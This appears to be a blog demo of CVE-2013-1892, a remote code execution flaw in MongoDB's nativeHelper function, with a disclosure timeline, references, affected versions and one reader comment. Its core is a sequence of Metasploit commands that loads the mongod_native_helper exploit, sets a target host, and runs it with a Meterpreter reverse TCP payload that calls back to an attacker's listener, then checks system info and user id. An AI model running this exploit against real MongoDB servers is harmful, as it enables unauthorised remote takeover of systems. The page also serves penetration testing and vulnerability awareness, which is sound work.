CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by agix around 2013-03-01
Vulnerability publicly disclosed by agix the 2013-03-24
Metasploit PoC provided the 2013-03-27

PoC provided by :

agix

Reference(s) :

CVE-2013-1892
OSVDB-91632
BID-58695

Affected version(s) :

MongoDB 2.2.3 and previous

Tested on Ubuntu 10.04 x86 with :

MongoDB 2.2.3

Description :

This module exploits a the nativeHelper feature from spiderMonkey which allows to control execution by calling it with specially crafted arguments. This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.

Commands :

use exploit/linux/misc/mongod_native_helper
set RHOST 192.168.178.53
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

sysinfo
getuid

19 thoughts on “CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo

  1. In what way is that a “spidermonkey” feature? Looks like the “native_helper” function was implemented by mongodb.

Comments are closed.